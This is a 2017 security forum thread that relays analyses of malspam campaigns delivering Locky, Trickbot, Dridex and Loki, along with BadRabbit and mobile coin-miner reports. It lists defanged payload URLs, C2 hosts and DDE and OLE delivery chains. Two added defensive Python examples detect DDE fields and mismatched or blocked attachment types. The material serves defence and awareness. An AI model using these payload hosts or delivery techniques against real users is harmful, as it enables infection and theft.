
Thread: SPAM frauds, fakes, and other MALWARE deliveries...

  1. #1291
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    Fake 'Office 365 update' SPAM

    FYI...

    Fake 'Office 365 update' SPAM - delivers Trojan
    - https://myonlinesecurity.co.uk/fake-...anking-trojan/
    23 Oct 2017 - "... an email with the subject of 'Office 365' pretending to come from Microsoft Security Team but actually coming via what looks like a compromised email account...

    Screenshot: https://myonlinesecurity.co.uk/wp-co...65_cthonic.png

    office_security_update.zip: Extracts to: ms_office_update.exe - Current Virus total detections 13/67*.
    Payload Security**...
    Update: after digging around the mail server quarantine, I have found several of these, coming via numerous different -compromised- email accounts. All of them have the same malformed content with no accessible attachment... The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
    * https://www.virustotal.com/en/file/7...is/1508670171/
    ms_office_update.exe

    ** https://www.hybrid-analysis.com/samp...ironmentId=100


    Last edited by AplusWebMaster; 2017-10-23 at 13:45.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  2. #1292 by AplusWebMaster

    'BadRabbit' ransomware, Fake 'Invoice', 'Scan Data', 'Order acknowledgement' SPAM

    FYI...

    'BadRabbit' ransomware attacks...
    > https://www.bleepingcomputer.com/new...astern-europe/
    Oct 24, 2017 - "A new ransomware strain named 'Bad Rabbit' is wreaking havoc in many Eastern European countries, affecting both government agencies and private businesses alike. At the time of writing, the ransomware has hit countries such as Russia, Ukraine, Bulgaria, and Turkey. The speed with which Bad Rabbit spread is similar to the WannaCry and NotPetya outbreaks... ESET and Proofpoint researchers say Bad Rabbit has initially spread via -fake- Flash update packages, but the ransomware also appears to come with tools that help it move laterally inside a network, which may explain why it spread so quickly across several organizations in such a small time..."

    > https://twitter.com/hashtag/BadRabbit?src=hash

    > https://www.csoonline.com/article/32...a-outlets.html
    Oct 24, 2017

    > https://www.welivesecurity.com/2017/...er-ransomware/
    24 Oct 2017

    > https://askwoody.com/tag/badrabbit/
    Oct 24, 2017

    > https://www.virustotal.com/en/file/6...d0da/analysis/
    BadRabbit.exe.virus / Uninstaller 27.0
    49/66
    File detail: FlashUtil.exe
    Additional info:
    install_flash_player.exe
    ___

    Fake 'Invoice' SPAM - using 'DDE exploit'
    - https://myonlinesecurity.co.uk/anoth...g-dde-exploit/
    24 Oct 2017 - "Another Locky ransomware campaign using the DDE exploit[1]...
    1] https://www.bleepingcomputer.com/new...eeding-macros/
    ... the word doc contains embedded -links- that use the DDE exploit to contact a remote server & get a base64 encoded string which decodes to a set of instructions to contact a list-of-urls in turn, until one responds...
    Asking somebody to 'update links' seems innocent enough and many recipients will click 'yes':
    Update fields warning message from DDE exploit word doc:
    > https://myonlinesecurity.co.uk/wp-co...ate-fields.png
    ... many of the intermediate stages and files never get stored or kept on the victim’s computer, in fact the final Locky binary is deleted as soon as it has been run, so there are few forensic artefacts for investigation. Brad Duncan has done a Blog post at ISC explaining all this in detail[2] with examples from the earlier run.
    2] https://isc.sans.edu/forums/diary/Ne...+attack/22946/

    Screenshot: https://myonlinesecurity.co.uk/wp-co...-DDE-email.png

    Invoice_file_921629.doc - Current Virus total detections 10/61*. Payload Security** | contacts
    'http ://transmercasa .com/JHGGsdsw6'
    where it downloads to memory the base64 encoded string which decodes to give these 3 urls
    http ://tatianadecastelbajac .fr/kjhgFG
    http ://video.rb-webdev .de/kjhgFG
    http ://themclarenfamily .com/kjhgFG

    This delivers heropad64.exe (VirusTotal 51/67[3]) (Payload Security[4]) which in turn sends a post request with system fingerprints to
    http ://webhotell .enivest.no/cuYT39.enc
    where if the response is acceptable it then downloads the Locky ransomware file from that site in an encrypted text format and converts it to a working .exe. 6213Lq3p.exe (VirusTotal 8/67[5]).
    It then autoruns it & deletes both the encrypted txt and the binary. It further contacts what looks like a C2 at
    http ://gdiscoun .org ...
    ... easy to protect against by changing 1 simple setting in Microsoft Word (provided your company does -not- use the DDE feature to dynamically update word files with content from Excel spreadsheets etc). See HERE for details:
    - https://myonlinesecurity.co.uk/malfo...o-viruses/#dde

    ... The Word doc has changed slightly since last week with a couple of blue star like images instead of just a few Russian characters or words:
    > https://myonlinesecurity.co.uk/wp-co...921629_doc.png

    ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
    * https://www.virustotal.com/en/file/4...is/1508840890/

    ** https://www.hybrid-analysis.com/samp...ironmentId=100


    3] https://www.virustotal.com/en/file/3...b0f2/analysis/

    4] https://www.hybrid-analysis.com/samp...ironmentId=100
    DNS Requests
    217.175.4.4
    Contacted Hosts
    217.175.4.4

    5] https://www.virustotal.com/en/file/0...is/1508841472/
    6213Lq3p.exe
    ___

    Fake 'Scan Data' SPAM - delivers Locky via 'DDE exploit'
    - https://myonlinesecurity.co.uk/locky...victim-domain/
    24 Oct 2017 - "... Once again the word doc contains embedded links that use the 'DDE exploit' to contact a remote server & get a base64 encoded string which decodes to a set of instructions to contact a list of urls in turn, until one responds, to download a small file which in turn downloads the main Locky ransomware binary...

    ... easy to protect against by changing 1 simple setting in Microsoft Word (provided your company does not use the DDE 'feature' to dynamically update word files with content from Excel spreadsheets etc) See HERE for details:
    > https://myonlinesecurity.co.uk/malfo...o-viruses/#dde ..."
    ___

    Fake 'Order acknowledgement' SPAM - malicious attachment
    - http://blog.dynamoo.com/2017/10/malw...ement-for.html
    24 Oct 2017 - "A change to the usual -Necurs- rubbish, this -fake- order has a malformed .z archive file which contains a malicious executable with an icon to make it look-like an Office document:
    Reply-To: purchase@ animalagriculture .org
    To: Recipients [DY]
    Date: 24 October 2017 at 06:48
    Subject: FW: Order acknowledgement for BEPO/N1/380006006(2)
    Dear All,
    Kindly find the attached Purchase order# IT/IMP06/06-17 and arrange to send us the order acknowledgement by return mail.
    Note: Please expedite
    the delivery as this item is very urgently required.
    Regards, Raj Kiran
    (SUDARSHAN SS) NAVAL SYSTEMS (S&CS) ...


    Attached is a file -Purchase order comfirmation.doc.z- which contains a malicious executable 'Purchase order comfirmation.exe' which currently has a detection rate of 12/66*. It looks like the archive type does -not- actually match the extension:
    > https://3.bp.blogspot.com/-fAXTqMJsH...7zip-error.png
    If the intended target -hides- file extensions then it is easy to see how they could be fooled:
    > https://2.bp.blogspot.com/-rrnVYS9MZ...s/s1600/po.png
    ... VirusTotal shows this information about the file**...
    The Hybrid Analysis*** for it is a little interesting (seemingly identifying it as Loki Bot), showing the malware phoning home to:
    jerry.eft-dongle .ir/njet/five/fre.php (188.165.162.201 / Mizban Web Paytakht Co. Ltd., Iran)
    > https://www.virustotal.com/en/ip-add...1/information/
    ... RIPE show them as being in Tehran:
    > https://www.ripe.net/membership/indi...ta/ir.mwp.html
    ... if you are -not- interested in sending traffic to Iran, Mizban Web Paytakht own AS64428 which comprises 185.165.40.0/22 as well. I'll make a guess that the 188.165.162.200/29 range may be -insecure- and could be worth blocking... You probably -don't- need to accept .z attachments at your mail perimeter, and any decent anti-spam tool should be able to look inside archives to determine what is in there."
    * https://www.virustotal.com/en/file/8...010f/analysis/
    Purchase order comfirmation.exe

    ** File detail: SysInv2.exe

    *** https://www.hybrid-analysis.com/samp...ironmentId=100
    DNS Requests
    188.165.162.201
    Contacted Hosts
    188.165.162.201

    Last edited by AplusWebMaster; 2017-10-25 at 14:49.
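    The 'update links' DDE mechanism described in the Fake 'Invoice' and 'Scan Data' items above can be caught before a user ever sees the prompt by reading the field codes inside the document itself. The Python below is an added example, not code from the forum post or from myonlinesecurity.co.uk; it assumes only the standard .docx layout (a ZIP holding word/document.xml, with field codes in w:instrText runs or a w:fldSimple w:instr attribute) and constructs its own sample documents, including one whose DDEAUTO keyword is split across two runs.

```python
"""Added example: flag Word documents carrying DDE/DDEAUTO field codes.

Assumptions (this example's own, not from the page): a .docx is a ZIP whose
body lives in word/document.xml; complex fields are bracketed by
<w:fldChar w:fldCharType="begin"/> ... "end"/> with the code in one or more
<w:instrText> runs; simple fields carry the code in <w:fldSimple w:instr>.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
# A DDE link field starts with DDE or DDEAUTO; Word tolerates leading
# whitespace and a quote, so strip those and match case-insensitively.
DDE_RE = re.compile(r'^\s*"?\s*DDE(AUTO)?\b', re.IGNORECASE)


def extract_field_codes(document_xml: bytes) -> list[str]:
    """Return every field code in document.xml, joining instrText runs that
    sit between the same fldChar begin/end pair (splitting the keyword across
    runs defeats a naive substring search on the raw XML)."""
    root = ET.fromstring(document_xml)
    codes: list[str] = []
    current = None  # buffer for the complex field currently being read
    for el in root.iter():  # document order, depth first
        tag = el.tag.split("}")[-1]
        if tag == "fldChar":
            kind = el.get(f"{{{W_NS}}}fldCharType")
            if kind == "begin":
                current = []
            elif kind == "end" and current is not None:
                codes.append("".join(current))
                current = None
        elif tag == "instrText" and current is not None:
            current.append(el.text or "")
        elif tag == "fldSimple":
            codes.append(el.get(f"{{{W_NS}}}instr", ""))
    if current is not None:  # unterminated field: keep what was seen
        codes.append("".join(current))
    return codes


def find_dde_fields(docx_bytes: bytes) -> list[str]:
    """Return the DDE/DDEAUTO field codes found in a .docx ([] if none)."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        xml = zf.read("word/document.xml")
    return [c for c in extract_field_codes(xml) if DDE_RE.match(c)]


def build_docx(body_xml: str) -> bytes:
    """Construct a minimal .docx around the given <w:body> content."""
    doc = ('<?xml version="1.0" encoding="UTF-8"?>'
           f'<w:document xmlns:w="{W_NS}"><w:body>{body_xml}</w:body>'
           '</w:document>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")  # minimal stub
        zf.writestr("word/document.xml", doc)
    return buf.getvalue()


# Constructed samples. The DDE target here is a placeholder, not a payload:
# the keyword is split over two runs ("DDEA" + "UTO") to show the joining.
MALICIOUS = build_docx(
    '<w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r>'
    '<w:r><w:instrText> DDEA</w:instrText></w:r>'
    '<w:r><w:instrText>UTO example_app "example_topic"</w:instrText></w:r>'
    '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
    '<w:r><w:t>Click Yes to update links</w:t></w:r>'
    '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p>')
BENIGN = build_docx(
    '<w:p><w:fldSimple w:instr=" DATE \\@ &quot;d MMMM yyyy&quot; "/></w:p>')

if __name__ == "__main__":
    print("constructed malicious doc:", find_dde_fields(MALICIOUS))
    print("constructed benign doc:", find_dde_fields(BENIGN))
```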

  3. #1293 by AplusWebMaster

    Fake 'Quotation', 'Payment slip', 'Payment Advice', 'Sage invoice' SPAM

    FYI...

    Fake 'Quotation' SPAM - delivers malware
    - https://myonlinesecurity.co.uk/fake-...ivers-malware/
    25 Oct 2017 - "... an email with the subject of 'Re: Quotation' pretending to come from SNG Equipment <sales@ sngequipment .com> (in previous similar emails, the sender & companies mentioned in the email body were fairly random). I am not entirely sure what malware this is. Indications are it could be Lokibot... This file has an icon that makes it look like it is an Excel spreadsheet. Unless you have "show known file extensions" enabled, it can easily be mistaken for a genuine XLS spreadsheet instead of the .EXE file it really is, so making it much more likely for you to accidentally open it and be infected...

    Screenshot: https://myonlinesecurity.co.uk/wp-co...tion-email.png

    Quotation.zip: Extracts to: Quotation.exe - Current Virus total detections 12/65*. Payload Security** ...
    The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
    * https://www.virustotal.com/en/file/2...is/1508905407/
    Quotation.exe

    ** https://www.hybrid-analysis.com/samp...ironmentId=100
    ___

    Fake 'Payment slip' SPAM - delivers Java Trojan
    - https://myonlinesecurity.co.uk/fake-...s-java-trojan/
    25 Oct 2017 - "... emails containing java Adwind, Java Jacksbot or other Java backdoor or Remote Access Trojans. We see these sort of emails frequently. Today’s has a slightly different subject and email content to many of the previous ones. This has a link-to-download-the-java-file rather than an attachment containing the malware...

    Screenshot: https://myonlinesecurity.co.uk/wp-co...-Slip-Copy.png

    The -link- hidden behind the image goes to
    http ://www.system.air-alicante .eu/lib/css/Payment508879883.jar (519kb)
    Current Virus total detections 1/62*. Payload Security**... system.air-alicante .eu looks to be a compromised Virtual Airline Site that appears to have been abandoned by its owner after a server crash. It was registered by Godaddy in July 2016 to a German Registrant. Currently hosted on 206.214.223.170 ServInt AS25847 which appears to be “owned” by a reseller fivedev .net who doesn’t have any abuse or contact details... The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
    * https://www.virustotal.com/en/file/4...is/1508882800/

    ** https://www.hybrid-analysis.com/samp...ironmentId=100

    system.air-alicante .eu: 206.214.223.170: https://www.virustotal.com/en/ip-add...0/information/
    > https://www.virustotal.com/en/url/7c...49ee/analysis/
    ___

    Fake 'Payment Advice' SPAM - delivers malware
    - https://myonlinesecurity.co.uk/fake-...ivers-malware/
    25 Oct 2017 - "... an email with the subject of 'RE: Payment Advice 2000076579' (probably random numbers, although both copies I received have the same numbers) pretending to come from OFFICE <office@ transferdept .com> with an ACE file attachment (ACE files are a lesser known form of zip file that needs special programs to unzip them. A high proportion of recipients will -not- have this software on their computer)... no idea what malware this actually is, although it is quite well detected on Virus Total as a generic malware.... As far as I can determine transferdept .com is a domain that is up for sale and has no website etc associated with it...

    Screenshot: https://myonlinesecurity.co.uk/wp-co...2000076579.png

    PAYMENT.ace (VirusTotal 10/59*): Extracts to: PAYMENT.exe Current Virus total detections 28/67**.
    Payload Security[3]... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
    * https://www.virustotal.com/en/file/2...is/1508921444/

    ** https://www.virustotal.com/en/file/e...is/1508933216/
    PAYMENT.exe

    3] https://www.hybrid-analysis.com/samp...ironmentId=100
    Contacted Hosts
    216.58.209.238

    transferdept .com: A temporary error occurred during the lookup...
    ___

    Fake 'Sage invoice' SPAM - delivers Dridex
    - https://myonlinesecurity.co.uk/fake-...anking-trojan/
    25 Oct 2017 - "... an email with the subject of 'Your Sage subscription invoice is ready' pretending to come from Sage which delivers Dridex banking trojan...

    Screenshot: https://myonlinesecurity.co.uk/wp-co...ady_-email.png

    ... The link-in-the-email goes to a -compromised- or fraudulently set up OneDrive for business/ SharePoint site where a zip file containing a .js file is downloaded. That eventually downloads the Dridex banking Trojan:
    https ://tailoredpackaging-my.sharepoint .com/personal/bec_tailoredpackaging_com_au/_layouts/15/guestaccess.aspx?docid=0b5a1a2799b6e419daf97f646640e195b&authkey=AduyYkbo5mf9IESLsGPE6yk

    Sage subscription invoice.zip: Extracts to: Sage subscription invoice.js Current Virus total detections 2/59*
    Payload Security** | Dridex Payload VirusTotal 13/67[3]| Payload Security[4]... The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
    * https://www.virustotal.com/en/file/d...is/1508929523/
    Sage subscription invoice.js.bin

    ** https://www.hybrid-analysis.com/samp...ironmentId=100


    3] https://www.virustotal.com/en/file/f...is/1508933673/
    mvrdcoqbki2.exe

    4] https://www.hybrid-analysis.com/samp...ironmentId=100


    tailoredpackaging-my.sharepoint .com: 104.146.164.27: https://www.virustotal.com/en/ip-add...7/information/

    Last edited by AplusWebMaster; 2017-10-25 at 18:48.

  4. #1294 by AplusWebMaster

    Fake 'TRANSFER PAYMENT ERROR', 'Invoice', 'account documents' SPAM

    FYI...

    Fake 'TRANSFER PAYMENT ERROR' SPAM - delivers malware
    - https://myonlinesecurity.co.uk/trans...ivers-malware/
    26 Oct 2017 - "... an email with the subject of 'TRANSFER PAYMENT ERROR (URGENT ATTENTION!!!)' pretending to come from OFFICE <office@ transferdept .com> with an ACE file attachment (ACE files are a lesser known form of zip file that needs special programs to unzip them. A high proportion of recipients will not have this software on their computer). Yesterday we saw a similar malspam campaign using the same-email details spoofing transferdept .com[1]... not sure what malware this actually is, although it is quite well detected on Virus Total as a generic malware. It is most probably Fareit trojan...
    1] https://myonlinesecurity.co.uk/fake-...ivers-malware/

    Screenshot: https://myonlinesecurity.co.uk/wp-co...TION-email.png

    PAYMENT ADVICE.ace (VirusTotal 19/59*): Extracts to: PAYMENT ADVICE.exe
    - Current Virus total detections 29/66**. Payload Security***... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
    * https://www.virustotal.com/en/file/c...is/1509003325/

    ** https://www.virustotal.com/en/file/6...is/1509008143/
    PAYMENT ADVICE.exe

    *** https://www.hybrid-analysis.com/samp...ironmentId=100
    ___

    Fake 'Invoice' SPAM - delivers Fareit trojan
    - https://myonlinesecurity.co.uk/more-...fareit-trojan/
    26 Oct 2017 - "... an email with the subject of 'Re: Invoice' pretending to come from Sales (random names and email addresses) delivers Fareit/Pony trojan...

    Screenshot: https://myonlinesecurity.co.uk/wp-co...oice_email.png

    NEW INVOICE.R23 (113kb): Extracts to: NEW INVOICE .com (which is an absolutely massive 11.5MB in size)
    Current Virus total detections 14/66*. Payload Security**| tries to contact
    http ://laximdiamond .com/fta/panel/shit.exe (which gives a 404) however there is an open directory
    http ://laximdiamond .com/fta/panel/ where we see this:
    > https://myonlinesecurity.co.uk/wp-co...ximdiamond.png
    It should be noted that this file has an invalid Microsoft Digital signature that expired in 2011:
    > https://myonlinesecurity.co.uk/wp-co...-signature.png

    The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
    * https://www.virustotal.com/en/file/0...daff/analysis/
    daff.exe
    Additional Information: File names: Madhavan.exe, daff.exe, NEW INVOICE .com, Madhavan

    ** https://www.hybrid-analysis.com/samp...ironmentId=100
    DNS Requests
    45.122.138.22
    Contacted Hosts
    45.122.138.22

    laximdiamond .com: 45.122.138.22: https://www.virustotal.com/en/ip-add...2/information/
    > https://www.virustotal.com/en/url/7d...6c4d/analysis/
    ___

    Fake 'account documents' SPAM - delivers Trickbot via DDE exploit
    - https://myonlinesecurity.co.uk/fake-...e-dde-exploit/
    26 Oct 2017 - "... using the DDE exploit[1] to perform malware campaigns... today the Trickbot gang have got in the act with an email with the subject of 'Your account documents' pretending to come from Lloyds Bank but actually coming from a look-a-like domain <noreply@ lloydsbankdownload .com> with a malicious word doc attachment is today’s latest spoof of a well-known company, bank or public authority delivering Trickbot banking Trojan...
    1] https://www.bleepingcomputer.com/new...eeding-macros/

    Screenshot: https://myonlinesecurity.co.uk/wp-co...ents-email.png

    > https://myonlinesecurity.co.uk/wp-co...ments_docx.png

    Documents.docx - Current Virus total detections 4/58*. Payload Security**...
    This malware docx file downloads from
    http ://preview.tastymovies .com/moviefiles/lorangosor.png which of course is -not- an image file but a renamed .exe file that gets renamed to ect.exe (VirusTotal 12/67***)
    Today’s example of the spoofed domain is, as usual, registered via Godaddy as registrar using privacy protection services.
    lloydsbankdownload .com hosted on numerous servers and IP addresses and sending the emails via 185.106.121.26 smtp3.wow-me .org | 95.211.213.219 | 185.2.81.3 | 213.152.162.231 | All of which are based in Netherlands... DO NOT follow the advice they give to enable macros or enable editing to see the content...
    The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
    * https://www.virustotal.com/en/file/4...is/1509019722/
    ec4b69380c33a9fa2b0145ed0b118ef2.doc

    ** https://www.hybrid-analysis.com/samp...ironmentId=100


    *** https://www.virustotal.com/en/file/c...5d5a/analysis/

    smtp3.wow-me .org: A temporary error occurred during the lookup...

    lloydsbankdownload .com: 95.211.213.219
    185.2.81.3
    213.152.162.231
    185.106.121.26


    tastymovies .com: 69.12.77.100: https://www.virustotal.com/en/ip-add...0/information/
    > https://www.virustotal.com/en/url/1a...7b03/analysis/
    ___

    Fake 'RBS bank line secure email' SPAM - delivers Trickbot via DDE exploit
    - https://myonlinesecurity.co.uk/fake-...a-dde-exploit/
    26 Oct 2017

    Screenshot: https://myonlinesecurity.co.uk/wp-co...cure-email.png

    > https://myonlinesecurity.co.uk/wp-co...4533._docx.png

    DO NOT follow the advice they give to enable macros or enable editing to see the content...
    The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."

    (More detail at the myonlinesecurity.co.uk URL above. )

    Last edited by AplusWebMaster; 2017-10-26 at 17:47.
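    The attachment tricks running through the 'Order acknowledgement', 'Quotation', 'Payment Advice', 'TRANSFER PAYMENT ERROR' and 'Invoice' items above (a .z archive whose bytes are not a .z file, ACE and .R23 archives most recipients cannot open, an executable named to pass as a document when extensions are hidden) can be checked mechanically at the mail perimeter. The Python below is an added example and not code from the forum post or any of the quoted blogs; the magic-byte table, the blocked-extension policy and the sample attachments are this example's own constructed assumptions, not a vendor's.

```python
"""Added example: perimeter-style sanity checks on an attachment's name
versus its real content. Assumed signatures (this example's own table):
ZIP, RAR4/RAR5, gzip, compress(1) .Z, 7z, PE/DOS 'MZ', and ACE, whose
'**ACE**' marker sits at byte offset 7 rather than at the start."""
import re

MAGIC = {
    "zip":  [b"PK\x03\x04"],
    "rar":  [b"Rar!\x1a\x07\x00", b"Rar!\x1a\x07\x01\x00"],
    "gzip": [b"\x1f\x8b"],
    "z":    [b"\x1f\x9d"],           # Unix compress(1) .Z
    "7z":   [b"7z\xbc\xaf\x27\x1c"],
    "exe":  [b"MZ"],                 # PE / DOS executable
}
ACE_MAGIC = (7, b"**ACE**")

# Extension -> the format the bytes must actually show for that extension.
DECLARED = {"zip": "zip", "rar": "rar", "gz": "gzip", "z": "z", "7z": "7z",
            "exe": "exe", "com": "exe", "scr": "exe"}
# Uncommon archive types most mail users cannot open: reject at the edge.
BLOCKED_EXT = {"ace", "z", "7z"}
RAR_VOLUME_RE = re.compile(r"^r\d\d$")   # .r00 .. .r99 multi-volume RAR parts
DOC_LIKE = {"doc", "docx", "xls", "xlsx", "pdf"}
EXEC_EXT = ("exe", "com", "scr")


def sniff(data: bytes) -> str:
    """Identify the container/file type from leading bytes, or 'unknown'."""
    for kind, sigs in MAGIC.items():
        if any(data.startswith(s) for s in sigs):
            return kind
    off, sig = ACE_MAGIC
    if data[off:off + len(sig)] == sig:
        return "ace"
    return "unknown"


def check_attachment(name: str, data: bytes) -> list[str]:
    """Return reasons to quarantine the attachment; [] means nothing found."""
    parts = name.lower().rsplit(".", 2)      # keep up to two trailing extensions
    ext = parts[-1] if len(parts) > 1 else ""
    inner = parts[-2] if len(parts) > 2 else ""
    actual = sniff(data)
    reasons = []
    if ext in BLOCKED_EXT or RAR_VOLUME_RE.match(ext):
        reasons.append(f"blocked archive type .{ext}")
    if ext in DECLARED and actual != DECLARED[ext]:
        reasons.append(f".{ext} declared but content is {actual}")
    if actual == "exe" and ext not in EXEC_EXT:
        reasons.append(f"executable bytes behind .{ext}")
    if inner in DOC_LIKE:
        reasons.append(f"double extension .{inner}.{ext} hides real type")
    return reasons


# Constructed samples modelled on the filenames quoted in the posts above.
SAMPLES = [
    ("Purchase order confirmation.doc.z", b"PK\x03\x04" + b"\x00" * 20),  # ZIP in .z clothing
    ("PAYMENT.ace", b"\x00" * 7 + b"**ACE**" + b"\x00" * 8),              # genuine ACE header
    ("NEW INVOICE.R23", b"Rar!\x1a\x07\x00" + b"\x00" * 8),               # RAR volume part
    ("Quotation.xls.exe", b"MZ" + b"\x00" * 30),                          # exe posing as XLS
    ("Invoice.pdf", b"%PDF-1.4\n"),                                       # ordinary PDF
]

if __name__ == "__main__":
    for name, data in SAMPLES:
        print(f"{name}: {check_attachment(name, data) or 'no findings'}")
```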

  5. #1295 by AplusWebMaster

    Fake 'Invoice' SPAM

    FYI...

    Fake 'Invoice' SPAM - delivers Locky via word docs with embedded OLE objects
    - https://myonlinesecurity.co.uk/blank...d-ole-objects/
    31 Oct 2017 - "... another change in the Necurs botnet malspam delivery that normally delivers Locky ransomware or Trickbot banking trojan. After a week or so of using the DDE exploit, today they have switched back to embedded-OLE-objects inside a word doc... The emails pretend to be invoices with a completely empty-blank-body... The word doc contains an embedded PowerShell -script- that runs when you follow their prompts to double-click-the-image. This contacts a remote server where it opens in memory (without saving to the disc in any obvious way) a set of instructions to contact a list-of-urls in turn, until one responds, to download a small file...

    Screenshot: https://myonlinesecurity.co.uk/wp-co...0808_email.png

    The word doc looks like:
    > https://myonlinesecurity.co.uk/wp-co...000808_doc.png

    Invoice INV0000808.doc - Current Virus total detections 5/61*. Payload Security** contacts
    http ://christakranzl .at/eiuhf384 where it downloads to memory a set of instructions that give
    these 6 urls:
    "http ://projex-dz .com/i8745fydd",
    "http ://celebrityonline .cz/i8745fydd",
    "http ://sigmanet .gr/i8745fydd",
    "http ://apply.pam-innovation .com/i8745fydd",
    "http ://bwos .be/i8745fydd",
    "http ://zahntechnik-imlau .de/i8745fydd"
    ... Using a UK based IP number, this delivered requ4.exe which is an old well known remote admin tool Netcat. (VirusTotal 48/67[3])... using a USA based IP via a proxy, I also got requ4.exe (from the same urls) but a totally different version that looks like Locky ransomware (VirusTotal 15/66[4]) (Payload Security[5])... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
    * https://www.virustotal.com/en/file/b...is/1509442810/

    ** https://www.hybrid-analysis.com/samp...ironmentId=100


    3] https://www.virustotal.com/en/file/7...is/1509448777/
    nc.exe

    4] https://www.virustotal.com/en/file/d...is/1509452021/
    requ4.exe

    5] https://www.hybrid-analysis.com/samp...ironmentId=100
    DNS Requests
    77.93.62.179
    Contacted Hosts
    77.93.62.179

    5.196.81.12: https://www.virustotal.com/en/ip-add...2/information/
    > https://www.virustotal.com/en/url/4f...71de/analysis/

    88.198.9.176: https://www.virustotal.com/en/ip-add...6/information/
    > https://www.virustotal.com/en/url/c2...66b5/analysis/

    Last edited by AplusWebMaster; 2017-10-31 at 17:29.

  6. #1296 by AplusWebMaster

    Banking Trojan targets Google Search, 'Coin Miner' Malware - hits Google Play

    FYI...

    Banking Trojan targets Google Search Results (SEO)
    - http://blog.talosintelligence.com/20...-campaign.html
    Nov 2, 2017 - "It has become common for users to use Google to find information that they do not know. In a quick Google search you can find practically anything you need to know. Links returned by a Google search, however, are not guaranteed to be safe. In this situation, the threat actors decided to take advantage of this behavior by using Search Engine Optimization (SEO) to make their malicious links more prevalent in the search results, enabling them to target users with the Zeus-Panda-banking-Trojan. By poisoning the search results for specific banking related keywords, the attackers were able to effectively target specific users in a novel fashion. By targeting primarily financial-related keyword searches and ensuring that their -malicious- results are displayed, the attacker can attempt to maximize the conversion rate of their infections as they can be confident that infected users will be regularly using various financial platforms and thus will enable the attacker to quickly obtain credentials, banking and credit card information, etc. The overall configuration and operation of the infrastructure used to distribute this malware was interesting as it did not rely on distribution methods that Talos regularly sees being used for the distribution of malware. This is another example of how attackers regularly refine and change their techniques and illustrates why ongoing consumption of threat intelligence is essential for ensuring that organizations remain protected against new threats over time... The initial vector used to initiate this infection process does not appear to be email based. In this particular campaign, the attacker(s) targeted specific sets of search keywords that are likely to be queried by potential targets using search engines such as Google. By leveraging compromised web servers, the attacker was able to ensure that their malicious results would be ranked highly within search engines, thus increasing the likelihood that they would be clicked on by potential victims...
    Having a sound, layered, defense-in-depth strategy in place will help ensure that organizations can respond to the constantly changing threat landscape. Users, however, must also remain vigilant and think twice before clicking-a-link, opening-an-attachment or even blindly trusting the results of a Google search..."
    IPs Distributing Maldocs:
    67.195.61.46: https://www.virustotal.com/en/ip-add...6/information/
    C2 IP Addresses:
    82.146.59.228: https://www.virustotal.com/en/ip-add...8/information/
    (More detail at the talosintelligence URL above.)
    ___

    'Coin Miner' Malware - hits Google Play
    - http://blog.trendmicro.com/trendlabs...s-google-play/
    Oct 30, 2017 - "... Recently, we found apps with -malicious- cryptocurrency mining-capabilities on Google Play. These apps used dynamic JavaScript loading and native code injection to avoid detection. We detect these apps as ANDROIDOS_JSMINER and ANDROIDOS_CPUMINER. This is not the first time we’ve found these types of apps on app stores. Several years ago, we found -malicious- apps on the Google-Play-store detected as ANDROIDOS_KAGECOIN, a malware family with hidden-cryptocurrency-mining capabilities:
    > https://www.gdatasoftware.com/blog/2...es-to-the-moon
    ... We’ve previously seen tech support scams** -and- compromised websites used to deliver the Coinhive JavaScript cryptocurrency miner to users. However, we’re now seeing apps used for this purpose, which we detect as ANDROIDOS_JSMINER.
    ** http://blog.trendmicro.com/trendlabs...-monero-miner/
    We found two apps; one supposedly helps users pray the rosary, while the other provides discounts of various kinds:
    > https://blog.trendmicro.com/trendlab...d-mining-1.png
    ...
    > https://blog.trendmicro.com/trendlab...d-mining-2.png
    Both of these samples do the same thing once they are started: they will load the JavaScript library code from Coinhive and start mining with the attacker’s own site key... This JavaScript code runs within the app’s webview, but this is -not- visible to the user because the webview is set to run in -invisible- mode by default... Another family of malicious apps takes -legitimate-versions- of apps and adds mining libraries, which are then repackaged and distributed. We detect these as ANDROIDOS_CPUMINER. One version of this malware is in Google Play and disguised as a wallpaper application:
    > https://blog.trendmicro.com/trendlab...d-mining-5.png
    These threats highlight how even mobile devices can be used for cryptocurrency mining activities, even if, in practice, the effort results in an insignificant amount of profit. Users should take note of -any- performance degradation on their devices after installing an app. We have reached out to Google, and the apps mentioned in this post are no longer on Google Play..."

    Related posts: http://blog.trendmicro.com/trendlabs...-banking-apps/

    > http://blog.trendmicro.com/trendlabs...-monero-miner/

    > http://blog.trendmicro.com/trendlabs...r-information/

    > http://blog.trendmicro.com/trendlabs...ad-filelessly/
    "... Conclusion: Fileless attacks are becoming more common. Threat actors are increasingly using attack methods that work directly from memory and use legitimate tools or services*. In this case, WMI subscriptions have been used by this cryptocurrency-mining malware as its -fileless- persistence mechanism. Since there are no malware files on the hard drive, it’s more difficult to detect..."
    * Fileless Threats that Abuse PowerShell
    > https://www.trendmicro.com/vinfo/us/...use-powershell

    Last edited by AplusWebMaster; 2017-11-03 at 18:58.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .
